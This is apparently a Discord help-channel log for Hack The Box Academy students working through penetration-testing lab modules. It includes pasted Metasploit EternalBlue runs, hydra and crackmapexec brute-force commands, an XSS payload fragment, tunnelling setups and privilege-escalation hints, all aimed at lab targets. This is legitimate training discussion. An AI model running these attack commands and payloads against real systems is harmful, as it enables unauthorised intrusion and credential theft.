yeah... that's not how that works

Ok?

you need to bruteforce a username and password

IPC$ generally isn't a directory (per se)

Well, I did the same thing with CASSIE, and still got the same error message

did you find their password?

Yes

and did you connect to their share?

I got not the username and the password

Yes

is the password the first in the password list?

:)

also in your connect command i don't see you pass the -U for the user

Typo, but yes I did -U

I got both the username and the password

Hello ! I'm currently a little bit stuck on Password Attack Modules. I succeded in having a meterpreter on 10.129.202.23. This target has a IC that allows me to connect to 172.16.1.0/24. It has the IP 172.16.1.5.
I also have a reverse shell on 172.16.1.10.
My goal is to put a msfvenom payload in the 172.16.1.10, so that I can then do a reverse port forwarding to my kali linux, so that I can have a meterpreter of this target 172.16.1.10 in my kali. But I can't find a way to transport the file from my kali to 172.16.1.10, or from 172.16.1.5 to 172.16.1.10.

smbclient -U "USERNAME" //ip/CASSIE/
<password> 1..0

wtf? Hold on

Well yeah, that's what I did

What I found odd was the username and the password were the same ones I had to use for WinRM

that would be incorrect then

each of the services has a unique logon

Hmm...

brb

try bruteforcing C

That's weird because I used crackmapexec, and that's the result I got

well did you add the -local-auth?

Let me try that

Got an error

maybe it's --local-auth

for cme/nxc

it's been a min i'd have to look at the man page

yeah it's --local-auth

I got the same username and password

Odd 🤔

It's --local-auth

--continue-on-success

Let me try that

but in reality you could make this easier on yourself by just doing smbclient -U "" -L //ip

and make an educated guess as to what the username is

you can additionally do --shares

in cme/nxc

Same thing, what the heck?!

--shares will enumerate share access

but again

you're making this way harder on yourself

look at the sharenames and tell me you can't make an educated guess as to whom the user may be

I'm wondering if I messed something when I had to use the same username and password for WinRM 🤔

That's the thing, I got the shares.

dude

I'm trying to get the flag

just because you can LIST shares doesn't mean the user has access to them

look at the sharenames

when you list them

and think

:)

the sharename isn't any of the x$ shares

each service has a unique user for them

you won't be able to enumerate another service with the creds you find

No no, I get that. My problem is why ls gives me an error message.

I got the shares

because you're not connected to the fileshare that has anything

as i've been saying

🤦

you generally can't enumerate IPC$

but also

you need to be the right user to enumerate it

if you're not the right user, smb says no

the user is c*

--continue-on-success btw is so that it continues even after it hits a positive result

but any valid user on the machine can list the shares

Wondering if anyone can shed some light on what I'm doing wrong.
Module: Web Fuzzing - Virtual Host
The input is: $ gobuster vhost -u http://inlanefreight.htb:42042 -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain

The output is: Error: error on running gobuster: unable to connect to http://inlanefreight.htb:42042/: Get "http://inlanefreight.htb:42042/": dial tcp: lookup inlanefreight.htb on 103.86.96.100:53: no such host

But when i run: $ gobuster vhost -u 94.237.57.131:42042 -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain
I only get "Found: Status: 400" enumerations.

check your /etc/hosts file dude

the error shows a different publicIP

Is there a way I can view how the modules solve certain questions?

hi I'm on the last question of assessment. I identified I am supposed to use Eternal Blue to exploit this machine. I know the machine is vulnerable but I am getting this error:

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.16.1.5:4444 
[*] 172.16.1.13:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.1.13:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard 14393 x64 (64-bit)
[*] 172.16.1.13:445       - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.1.13:445 - The target is vulnerable.
<SNIP>

[-] 172.16.1.13:445 - Did not receive a response from exploit packet
[*] 172.16.1.13:445 - Sending egg to corrupted connection.
[*] 172.16.1.13:445 - Triggering free of corrupted buffer.

use a different exploit

but it says its vulnerable and the name of the machine has the word "BLUE" in it

there's a handful of eblue some include exec in their name

i'm aware

ok got it thanks

https://tenor.com/view/dont-fight-me-on-this-head-shake-dont-even-try-please-stop-it-gif-15396415

hey qq: I'm working on the linux privilege escalation/ enviroment enumeration section and I was wondering if I can get any hints on where to be looking I've looked in home directories / etc/passwd /tmp /var/tmp. I looked on gtfobins different ways to escalate with /bin/ncdu and I guess I'm just not understanding what I'm missing.

i believe you're thinking too hard about this

I'm trying a different exploit now. This one is giving me an error that says exploit completed but no session created:

msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.1.5:4444 
[-] 172.16.1.13:445 - Rex::ConnectionTimeout: The connection with (172.16.1.13:445) timed out.

[*] Exploit completed, but no session was created.

the man pages for it will be helpful

is the LHOST right?

I tried two different LHOSTS

just make sure you don't mistype :)

I do too like / man pages for machine I'm on

there's a specific thing with ncdu that allows you to spawn a shell with it

:)

now I have right LHOST I think because got different result:

msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] 172.16.1.13:445 - Target OS: Windows Server 2016 Standard 14393
[*] 172.16.1.13:445 - Built a write-what-where primitive...
[+] 172.16.1.13:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.1.13:445 - Selecting PowerShell target
[*] 172.16.1.13:445 - Executing the payload...
[+] 172.16.1.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

but still no session created

is it the port number?

don't adjust the port

i would say at this point reset the target and try running it again

this assessment can be dumb sometimes

ok thanks

will do

Try bind

I reset the target I got same result:

msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] 172.16.1.13:445 - Target OS: Windows Server 2016 Standard 14393
[*] 172.16.1.13:445 - Built a write-what-where primitive...
[+] 172.16.1.13:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.1.13:445 - Selecting PowerShell target
[*] 172.16.1.13:445 - Executing the payload...
[+] 172.16.1.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

wrong LHOST

hold on

ok changed lhost

https://tenor.com/view/screaming-mad-fish-sponge-bob-angry-gif-12369198217513035864

make sure you do ip a; as a shortcut in msfconsole, if you know the interface name, you can just do set <interface name> and msfconsole does magic

cheese and crackers! FINALLY!!!

🅱️

My gif won't show?

Shame

because your account isn't linked

see #welcome

I saw where I went wrong 🙄🤦🏽‍♂️

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

I tried all three different LHOSTS and it wouldn't do anything

Try bindshell

wtf are you on about?

do you even know the module and question he's doing?

all three LHOSTs give same result

try one of the other exploits

Ok, on to the next one ☺️

I tried every lhost

Metasploit right?

the lhost should be the 172.16 one

wrong

I know I tried that one

shells and payloads module

Oh yeah

reread my edited comment

another thing is potentially changing vpn region and respawning the target, and seeing if that makes it work

¯_(ツ)_/¯

wait I got a meterpreter

weird that it would work for 2/3 hosts

ah

well the rest is ez

got flag

Nice

okay so I'm just not getting it I've read through the section in the man pages about shell and saw this command
"export NCDU_SHELL=vifm
ncdu"
It spawns a shell in the dir I'm in but how do I know if i have used it right or not

🅱️

also sudo is helpful

idk why I'm overthinking this so much

maybe I'm just burnt out today

sudo has some fun things you can do like with id # instead of username

try sudo -l to see what you can actually run as root

always see what you can (su)do

literally the first command i run when i get a foothold in linux

anyone else having VPN issues? Wasn't joining on US5 so i went to switch and only have access to the generic 'academy-regular'

try hard refreshing the page

that don't look right

yeah i also logged out and logged back in....may clear web browser i guess

or i'll try private browser first

private browser worked, looks like it's time to delete all the web things

just ctrl + shift + r

^

sorry i guess not everyone knows what hard vs soft refresh means

soft refresh is just the ctrl+r that keeps cache; you'd note the lack of a get request in the network tab

ctrl+shift+r does a clear of cache for the loaded resource

yeah ctrl+shift+r didn't change it either

appreciate the tips though, i definitely wasn't aware of the hard refresh

ye

basically forces your client to call the server for an update

instead of relying on what's in your cached page

fuckin lmao the hostname

keep my hostname out of your fuckin' mouth

Pivoting, Tunneling, and Port Forwarding

RDP and SOCKS Tunneling with SocksOverRDP ,This assessment is just broken.I can't connect,and very time there is a different problem

try another region

also make sure to modify the rdp settings as shown in the module for connection stability

finally

congrats

Admins, I have completed all of the SOC path except 2 sections, which I am unable to complete due to rdp Issues. I have tried all of the Troubleshooting Methods. The machines just freeze or i encounter weird problems like the machine just dropping the RDP connection. Can someone help me with these 2 sections so that I can complete the path?

I have been stuck at these 2 (Windows Attack/Defense) for the better part of a week now 😦

Any hint mode xss section phishing. When I send url it says issue sending url what the issue in that no clear hint is given by htb

http://[target_ip]/index.php?url=[payload] iirc

Been a hot minute since I finished it

Let's not share the payload

when i send it says issue in sending url

And does that payload work just fine on your end when testing it?

yes i tested it works fine but when i go to send.php it says issue in sending url

any hint why it not working

Try url encoding your payload

¯_(ツ)_/¯

i have tried still not working

and paylaod is already encoded

Did you remove the port from the url?

what port

http://10.129.73.63/phishing/index.php?url=payload

Oh wait, I was thinking about the advanced xss module

ohh no

Did you include the port in the payload that sends to you

no

olny ip

Again

Don't send payload, as it's a spoiler

Well.. are you hosting the web server on port 80?

yes

Ah

i tried with port 80,8080

443

Lemme dig up my payload

??

So I can see what I did to guide you

You goober

??

now m stuck what should i have to do

no if you've properly escaped the tag that your payload gets sent to it should work

though from what you showed it looked like you started with ( for some reason (unless that was some typo or something)

if that wasn't, i want you to inspect the page source of where your payload is getting placed

and also don't forget to add the html comment at the end

<!--

i absolutely hate the fact that I can read the Hex code/url encode for my payload

https://tenor.com/view/tmnt-donatello-big-stick-all-ive-got-is-a-big-stick-how-did-i-end-up-with-a-big-stick-gif-15312349844546891262

i'm telling you something you did to escape was wrong

it shouldn't start with ( or'

can u share your payload

Uh oh. Your mind is starting to talk fluent hex

nah i've just revisited this payload and know what it is without the url encoding

all the "> and stuff man

https://tenor.com/view/well-it-wouldnt-be-the-first-time-doc-mullins-virgin-river-breaking-point-its-not-the-first-time-its-not-new-gif-19858353

so what should i have to do now

https://tenor.com/view/ghost-rider-negative-ghost-rider-nope-no-top-gun-gif-3052207666502768433

go back to the drawing board and inspect the page source when you throw anything at the url parameter

Go over the section again and follow it step by step

Apply it to the exercise

look at EXACTLY where your payload is getting dropped

is it getting dropped, for instance, inside a tag, in between quotes

just from seeing what i've deleted from you

the beginning of your payload is wrong; the rest is right

you haven't escaped the matrix

https://tenor.com/view/wrong-drumpf-trump-stupid-gif-6220235

oi

Spoilers please

do i need a bigger stick

Yes

https://tenor.com/view/courage-the-cowardly-dog-eustace-mallet-angry-its-go-time-gif-4845999

YOU'RE SPOILING CONTENT

jfc

https://tenor.com/view/bad-bunny-kendo-stick-pick-up-gif-15175715560639572511

sorry that why i have sended half payload

the payload is a spoiler since it practically gives away how to get the answer

the payload portion is what you've been sending

http://ip/phishing/index.php?url=

https://tenor.com/view/test-patience-the-lord-is-testing-me-gif-12883719

ok

it is mention in section

and the module isn't tier 0

so

https://tenor.com/view/deep-breaths-deep-breath-deep-breathing-caryanne-gif-24937623

i just shared what is mention in section

it's still revealing content that's technically paid

ok

only t0 content is "free" and able to be shared with no consequences, according to HTB ToS

:)

ANYWAY

neway

;document.getElementById('urlform').remove();</script><!-- my last part is like this

i've given you the hint on where to look first

inspect where your payload is getting dropped

i didnt get it could u please make it easy

can't say it any more clearly than i have been

the module shows you in-fact

about inspecting the page source

okay.. let me check it again

anyway whenever you're crafting any sort of web injection payload, you want to know at what element your payload is getting dropped

the only way to see where it's dropping in at, is to view the source

and I am not giving you a hint in DM

How long is your streak @fathom pendant

21

Nice! I’m at 24 but probably losing it 😦

Off work - and wife/kids are keeping me busy lol

Hello, anyone done the Skills Assessment of Server Side Attack Module? The assessment give us a low-previlege user credential but I couldn't find a way to login
Anyway I already got the flag without login but just wondering where I can use that credential

it is in image tag

correctly observed

note exactly where in the tag it's placed

:)

(this is also why this is dangerous)

why url : phishing or phishing/send.php

?

i just meant having user input being directly placed into your html form with no validation

yes there is no validation in user input

anywhey

your input gets placed firmly in between two quotes

"input" if i do like this : "payload is start adding quot ""payload"

why not just escape the image tag? :)

i cant understand everything is fine when i send the malicious url to victum in send.php it saya issue in sending url thats all

well

that means there's something wrong with your payload

is what i'm getting at

Moduel: pivoting, tunneling & lateral movement
Section: ICMP tunnel
I have compiled the static binary and had it running in the ubuntu pivot host (whose ip is 10.129.202.64) w/ || sudo ./ptunnel-ng -r10.129.202.64 -R22 ||
I also had it running to connect to the tunnel from attack host to the ubuntu machine w/|| sudo ./ptunnel-ng -p10.129.202.64 -l2222 -p10.129.202.64||
after that I try to connect to the tunnel and forward it to 9050 for proxychains: ||ssh -D 9050 -p2222 -lubuntu 127.0.0.1||
and when I scan the remote target address w/ command || proxychains nmap -sT -sV 172.16.5.19, returns that all host is down or filtered.
Did I messed up the tunnel building procedure?

how'd you compile the binary

just use autogen.sh
and follow this guy
#modules message

there aint configure file without compiling it first w/ autogen.sh

Can someone help me in the Introduction to Windows Evasion Techniques - Static Analysis?

I've compiled the executable in the Dev Host, tested, got a callback to msfconsole.
Uploaded the file to the directory, check says it's not detected by Defender but no flag is created

https://academy.hackthebox.com/module/51/section/1845Why can't I connect? I reset the IP and it doesn't work.

because you are using the wrong credentials

That's impossible. I copied and pasted it.

it is possible

especially when you're using the wrong user name.

Yup

which is understandable I guess since pretty much every other exercise I've done uses 'htb-student'. haha

I'm stuck on the first question in the practical digital forensics scenario module. I've done base64 decoding from the suspicious poweshell then I looked for the payload in the github repo but there were no results. can anyone help me?

holyshit

https://tenor.com/view/asdf-asdfmovie-i-can't-read-i-cant-read-punished-lion-gif-3532527054645921660

when the moment hits

sure i can help! could you provide more details about the first question

Any idea why there is no explanation of modules in a video style?

Sometimes reading gets me exhausted

fr

just gotta take a break and come back later

may be primarily focuses on . hands on practical learning experiences which is why most of their content is text based and interactive

also if they want to add/edit a module a video of the module would have to be redone and that's a lot of effort

+1

Yeaa I understand but bro sometimes...

but just about everything in cyber is all text based, the code, the reports, the write-ups, the documentation

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.

for this you need to dump the memory of the powershell process, use tools like volatility or rekall it may can help you ||volatility -f memory_dump.raw --profile=PROFILE malfind -p 6744||

https://academy.hackthebox.com/module/51/section/470I have absolutely no idea what the question here is asking, can someone please tell me

I tried the answers one by one.

after look for suspicious or interesting content , later Look for patterns, function, names ,specific code in the memory dump that match the tools or functions at powerSploit github

https://forum.hackthebox.com/t/special-permissions-linux/281749 !

how did you answer it then

imposter lmao

The answer is that I figured it out through trial and error

Hi there, I'm trying to solve Academy question, and I'm scanning for services running on non-standard ports, should thins be taking crazy amount of time, like 1hr or more?

that's too vague of a question without seing the actual scanning technique

Reduce scan options

I'm scanning all ports, since a service is running on a non-standard port

you could try using -T5

or -T4

though the faster the scan, the more likely it is to miss a port

first run basic nmap test nmap 10,129.250.56 later specify ports like this nmap -p 21,22,

Oh so I already did do that and found my answers, on this particular question, I'm looking for telnet running on a non-standard port, that's why I'm scanning all of them.

Thank you, appreaciate the help.

it could also be VPN issue, I would try a ping too and if jitter is all over the place, that would slow down the scan

You're right about that, it's more of a connection issue, there's a bit packet loss too

yeah, I would switch vpn location then, that does the trick for me sometimes

can anyone tell me why my proxychains doesn't work ?

Okay I'll go for that, but the T5 switch is much better from what I can see, if that fails I'll change the vpn location, Thank you.

Which part? And please show us what you did. We can’t answer you based on your question as we don’t have a magic crystal ball;)

Hey guy, can someone give me a little nudge on Web Service & API Attacks - Skills Assessment please

did you put the socks4 or 5 IP and port in /etc/proxychains.conf?

Is job role path free to access guys ?

What exactly is not working?

Only the Tier0 modules are free of charge

Anyone here can help me with a problem in Linux mint?

Can anyone kindly take a look at this question? I am still at a loss on ICMP tunnel pivoting

How much I have to pay for learning and attending penetration testing job role path?

depends on how long you finish the path
subscription plans starting from silver would allow you to acess everything in the job path
student is even better but you need a .edu email acconut first

.edu email will be provided by the clg right?

normally yeah?

How much is for subscription ?

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions

I parsed the wsdl with burp wsdler copied the post request parameters (I think), but I can't get to run it ...
I do it with the python script ...

I get user ||kundrill0|| ...

not sure what I'm missing...

anyone know if there is problem with the AD enumeration & attacks section? I try to xfreerdp in to the boxes but its just a black screen then disconnects

the black screen you just hit enter it works, but the rdp session randomly hangs and disconnects...

Pretty sure I just saw someone asking about this the other day. Have you searched here with the search function to see if a similar question was answered or if a solution was previously provided?

hey , im doing pass the ticket in linux,

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
i got the flag but it tells me that my submission is wrong

I don't recall this flag, but generally some things to try are to ensure there aren't any spaces before and after the flag. If that doesn't work, try refreshing the page and try to submit it again. Can also keyword search that and see what others may have previously recommended.

did all of that but nothing

I'm at my computer now, so I can check my notes. What module is it? Password attacks?

yep

Send me a DM.

Hi everyone, I hope you’re all well,
for the ‘Attacking Common Services - Hard’ module I’ve already solved it by
first impersonating a J User…
using testadmin of the linked server LOCAL.TEST.LINKED.SRV to execute commands
using xp_cmdshell directly to get the flag, apparently there’s another way to log in or get the admin hash, and I tried but couldn’t
(using responder to capture the hash), I’d like you to please help me with the second method
thks…

out of mind, if anybody can help I would appreciate it

Try sending XML data
Remember that you have to encode special characters in XML

You don‘t need any user

I did

Take another close look at the Xpath section. You don't have to bruteforce anything

wait what u mean xml ?

Send me a dm

Is there a wiser way of doing windows-to-windows file transfer other than base64 text copy and paste and decode?
I figured that impacket-smbserver, python server etc can be used in a Linux attack host, but what about windows-to-windows in a real engagement? (maybe cifs?)

you can mount a drive in an rdp session and copy/paste the file you need

just enter when you see the black screen

No, you don't need all the data. Look in the module how you can filter data.

this does work to get rid of the black screen but it also disconnects after a couple of minutes and have to keep relaunching the rdp session

DM

That's a connection issue then. Are you using the tcp vpn, also /timeout:9000

I did it using udp vpn, but also tried it using the pwnbox

Well if you're trying with pwnbox, turn off the vpn on your vm

Has anyone done : "Error-based SQL Injection" section of the "Advanced SQL Injections"

I dumped the database, found the user potus4 as requested, took the java code that does the password reset and swapped the variables with the dumped user information. Now HTB is telling me my password reset link is no good. I swear I'm so confused, everything looks good. I tried in python, java and the password reset link is always the same, so I don't know why HTB won't accept it as the answer

Anyone completed the WhiteBox Attacks module, i need just a bit of assistance on the client side prototype pollution

I'm willing to swap info if you've done mine lol

which one is yours ? 😄

See a few posts above, I'm stuck on this thing

Yep i have done it, ping me in DM

Hi

good day. I am running into a mental block ith a couple of questions in the Linux undamentals System Information

Then it's best to take a break

I've been working on this module for 5 days LOL

Take your time. It's not a race

It also helps to ask your question

We're not mind readers we don't know what you're struggling with, just that you're struggling

yo everyone i don't understand a thing on the course https://academy.hackthebox.com/module/113/section/1094, I was able to get the flag with metasploit but not with notification creation. Has anyone been able to get it this way?

This question What is the path to htb-student's home directory? I used the $ echo $ Home and the path that as given is wrong.

You need to ssh to the target

Make sure you spell the username right when you're testing the creation

prtgadm1 (from the example) not prtgadmin1

I'm having trouble with gobuster vhost scanning: academy.hackthebox.com/module/280/section/3132
Using GoBuster against the target system to fuzz for vhosts using the common.txt wordlist, which vhost starts with the prefix "web-"? Respond with the full vhost, eg web-123.inlanefreight.htb.
I ran the command gobuster vhost -u http://IP:PORT -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain, replacing IP:PORT with the target's ip and port number. It finished the scan after 4 thousand requests, and checking with wireshark, the requests are correctly formatted. It did not return any successes. What am I doing wrong?

OK, I’ll test when I get home thx

Wrong?

You need a domain to append

hello, can smdy help me for a module of CDSA : Windows Event Logs & Finding Evil

On the skills assessment question 3 : By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.e

im rly blocked to continue .. i dont understand how to find this

try controllers

I use the target that is provided (ex. 1.1.1.1:1234) in place of IP:PORT

That's still not a domain

A domain is like google.com

Or inlanefreight.htb

😄

oh

what do I use?

What does the question/"vhosts needed" tell you?

Nop

this is the question: Using GoBuster against the target system to fuzz for vhosts using the common.txt wordlist, which vhost starts with the prefix "web-"? Respond with the full vhost, eg web-123.inlanefreight.htb. the target system is the ip and port I have. I used the command provided above in the guided instruction section

inlanefreight.htb

I believe with gobuster it's -d or --domain

(Or you add it to your /etc/hosts)

ah ok

??

Also in future use the module and section name, not just the endpoint (/module/...)

Because that really isn't helpful

It helps us if you tell us the module

And section

Intro to Active Directory

Also try the singular, not plural

/Active Directory Objects

Module: info gathering web edition
Section: virtual hosts

oh ok I'll try to remember that. even after adding the domain to /etc/hosts, gobuster gives an error:
Error: error on running gobuster: unable to connect to http://inlanefreight.htb:81/: Get "http://inlanefreight.htb:81/": dial tcp: lookup inlanefreight.htb on 8.8.8.8:53: no such host
this happens with and without specifying the port 81

Or whatever section you're working on

Module: Intro to Active Directory
Section: Active Directory Objects

Because you fucked up your hosts entry

web fuzzing
virtual host and subdomain fuzzing

You don't include the port in the hosts entry

I added this line: IP inlanefreight.htb

And did you specify the port in your gobuster command?

:)

yes, I did. I also tried without specifying the port

Did you specify http://inlanefreight.htb:PORT ?

Does any one know why on Web Attacks > advance file disclosure I can't use CDATA method to include /etc/passwd but I can use the regular method

I know that my payload works

Not all methods shown may work

I ran both these commands:
gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain
gobuster vhost -u http://inlanefreight.htb -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain
the first command is exactly the same as is given by the section, just with a different capitalization for "seclists" in the path

Why are you specifying port 81?

It's a docker container with an ip:port no?

The :81 in the example is to show that you can specify a different port

that's the thing it works on flag.php, but not on /etc/passwd

which port do I use?

¯_(ツ)_/¯

The one given by the target spawn

It's a publicIP:PORT

The publicIP is what you put in /etc/hosts with the domain, and the port is what you use in your requests http://domain:port/

ah I tried that. it doesn't work

Wdym "doesn't work"

Doesn't work isn't an error

I took the inlanefreight.htb ip and the port from the target spawn (a number). the error is the same as before, just with a different port (mee6 doesn't like me sending a similar message again)

sigh what does the entry look like?

If it's ip:port in the hosts entry, that's why

But also if you read and follow #welcome you'll be able to post code blocks/formatted messages

└──╼ $cat /etc/hosts | tail
# Host addresses
...
# Others
IP inlanefreight.htb

is there an "easy" way to transfer files from Windows to Linux? taking apart the b64 encoding, nc and shared drive on rdp

I want the full actual entry that's in your file

Not shortened

Shared folders

uploadserver

If a vm

Xfreerdp has the /drive: option, which mounts on the \\ts-client\ share

└──╼ $cat /etc/hosts
# Host addresses
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
# Others
IP inlanefreight.htb

Wait

Do you literally have the text IP in your hosts file?..

i see, but if i ended up in a windows machine via revshell and there is not rdp service up?

yes

thank you all btw

Beat me to it

That's why it's not working lmfao

oh. it gave me the command echo "IP inlanefreight.htb" | sudo tee -a /etc/hosts

... you replace IP with the spawned IP

ohhh that makes sense

It can't route to something if it doesn't know what it's routing to

ok it's finding stuff.

👍

I got the answer. thank you

https://tenor.com/view/homer-simpson-computer-operator-error-gif-11140134

somehow I always have the stupidest mistakes

Too caught up in the reading

It happens

Could use a different perspective for Active Directory Enumeration & Attacks, Privileged Access section. I have a cypher query I can run in BH to view all principals who have PSRemote privileges but my BH query does not return anything while the course (and the assessment question) suggest it should. Why is that happening since the data I've dumped is as shown in the course

This is a channel for academy content

Which module is this for?

Hacking is illegal

Either way is not the place for this

That’s what they all say. But this is not the place to ask/share exploits. It’s for help with academy modules only.

Hello, I'm doing the question on the "Data Movement" section of the "Intro To Assembly Language".

They want me to make some changes to this assembly code but it is throwing a SIGSEGV on the very first instruction. Doesn't seem like that's intended.

global _start

section .text
_start:
    mov rax, 1024
    mov rbx, 2048
    xchg rax, rbx
    push rbx

This is the GDB output

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x401005 <_start+0005>    mov    ebx, 0x800
     0x40100a <_start+000a>    xchg   rbx, rax
     0x40100c <_start+000c>    push   rbx
 →   0x40100d                  add    BYTE PTR [rax], al
     0x40100f                  add    BYTE PTR [rax], al
     0x401011                  add    BYTE PTR [rax], al
     0x401013                  add    BYTE PTR [rax], al
     0x401015                  add    BYTE PTR [rax], al
     0x401017                  add    BYTE PTR [rax], al
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "mov", stopped 0x40100d in ?? (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x40100d → add BYTE PTR [rax], al
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Am I doing something wrong? Is this intended?

that's the last instruction in the GDB output. did you set a breakpoint?

Ah, sorry, I completely misread the output. I didn't set any breakpoints, I tried to just run the program as is to ensure that everything was working and the error threw me off. Should have done that

Helloo, for some reason I'm really stuck on the Attacking Common Services module at the SMTP section. I understand what needs to be done but when using hydra to brute force the password but have no results (have checked the forum and youtube videos to confirm that I was doing the correct thing). Can anyone please help me out 🙏

did you first get a username?

yep

and am using the full username to perform the bruteforce

also sometimes you need user@domain sometimes you just need user

I have tested with both but still no luck, may I send the command I'm running for the bruteforce here?

redact the username; i also assume you're using the given wordlist from the module?

hydra -l <username> -P pws.list -f 10.129.136.69 smtp

Yes using the wordlist from the resources

i generally do protocol://ip but it doesn't matter too much

try another mail protocol ? (SMTP usually runs alongside IMAP and POP3)

I also tried with pop3 but no luck, will attempt with imap

often SMTP isn't running an auth service

and is just used as the relay

aha I see, okay will give it a try now

still no luck

sec

is there any chance that the specific target host has an error or is that unlikely?

try with rockyou

if the given wordlists don't work, always fall back to rockyou

Okok will try out now

also don't worry about the expected time it says for rockyou to complete

expected time != actual time

it's easy to see 143333 hours and go "UHHHH"

I couldn't find anything with rockyou either.

I don't think it's a wordlist issue though

you can't have run through rockyou that fast

also in this instance it's user@domain for the login

still running, it timed out before for some reason

the password isn't that deep on the list

you're running default threads yeah? (like 16 or something?)

should crack nearly instantly

my syntax was hydra -l user@domain -P /path/to/rockyou.txt smtp://IP

and like almost the second it popped it started it found it

:)

Yep, should I change that?

nope

i didn't do any changes to threads

interesting

i'd reset the target and test with a new target

Will try that, thanks!

(note I just tested with a fresh spawn, and it worked)

Hello everybody, sorry for my bad english but i really need your help, I am being harassed a lot for a toutubz account that I created when I was little, I want to delete it but I lost my codes and my email I don't even know which email is associated with this account, I really need help I really want all this to end please help me

If someone can just de l’été thé account for me, its a very small account with like 15 follower its should be easy

YouTube *

You're right, resetting the target did the trick - thanks a lot for your help 🫶

Delete *

We can’t help you with this

Oh why

This isn’t hacker for hire

Contact YouTube support is your best bet

…

Them didnt answer me

Iam finally cook

We can’t help you with this

Hacking YouTube is illegal. Asking someone to perform illegal things is also against discord ToS

But no one Will realise then thé account was hacked because i have like 15 follower, and thé last vidéo was in 2017 thé account is forgot

Contacting YouTube support again is your only option

We can not help you.

You cant even just tel me what is the e-mail of the youtube account

And i Will do thé ready

Rest

No. Please stop asking about help with your YouTube problem. We won’t help you

Ask YouTube support

Okay Iam sorry bro…

I am curious how you all did footprinting medium if you remember. If i remember correct you weren’t supposed to run exploits, then i got sick and tired and did it anyway to get LPE.

I bodysearched each and every server in the subnet and outside lmfao, the sa creds i found dint do jack and another hash refused to get cracked and couldn’t use it to PtH. After spending more time than i think i should’ve, i just said fk it and ran printnightmare exploit i always have saved

No problem, I hope YouTube support responds asap. You can always try to report your videos for impersonation or so.

Tried playing by the rules but sometimes i’m too inpatient

the whole point is to do it without running exploits

the module is all about enumeration

Then i did wrong, i was unsure because it was only mentioned in the first part

But man did i enumerate

Yes i Will try it

I have 10 txt files if scans

Ping sweeps

Everything

you did not enumerate thoroughly enough then

there isn't even a need to ping sweep because it's only one target

Overcomplicated it a bit; during the enumeration i saw that it wasn’t a DC

Tought the DC was the goal

it's a single target though..

Nah wait a second

When i said i literally enumerated every single corner, i wasn’t lying. Looking at how it was supposed to be done originally, it was one of the first things i did

And it did not work for me

After that i started ping sweeping because i tought that wasn’t it

Tought it was a red herring

but you're given a single target

and you can only spawn a single target, it isn't a network

Don’t know how it works in HTB, but some CTFs i’ve done before started with one target, and considering it is about enumeration, and not being able to use the credentials i found, i started thinking i’m maybe supposed to look at all the other servers

To use the credentials

Or find more credentials

you will be told if you are working with a single target or a networked environment

and in the given scenario, it tells you that you're working with one server

Alright, i used remmina, have you heard abt it being a problem before

Because that’s what i used trying to do the original method

usually it's xfreerdp that has issues

Yeah it crashed on me 100 times

So i went to remmina instead

Remmina ftw

i also wouldn't assume that exercises give you red herrings

given that these exercises are designed to test you on what you're taught in the module

they are not CTFs

virtually every exercise can be completed with what is taught in the module, and doing stuff out-of-scope defeats the purpose of the exercise

(i don't care to read up) what module/exercise is he working through?

Footprinting - Medium Lab

seems like it could have been an issue with the lab environment, but considering i had the same issue as well and got through it, might be a user error

50/50

yeah my notes on this lab are pretty streamlined

service A --> Service B --> test for reuse --> Success (dumbing down my flow a bit here, not saying what services for obvious reasons)

a proper scan of the environment shows many doors ed boi

i believe i found something important by just clicking around, but apparently i just had to do something else related to a service to find it easier

then just test for password reuse/runas (Though UAC doesn't let you copy/paste)

Hello guys, any hints for Skill Assessments - Advanced SQLi, I stuck at get 2nd flag to the RCE. I did use $$ to bypass single-quote, and compile the exact version postgres. But somehow does not work = =!

That’s also exactly why i wrote here. Because after scratching my head for more than an hour, i felt that something was wrong.

Found the creds directly after enumerating

When i initially RDPed

well yes but that initial user doesn't have sufficient permissions so gotta do even more enumerating

enumeration is an iterative process

if user cannot access files, find someone who can :)

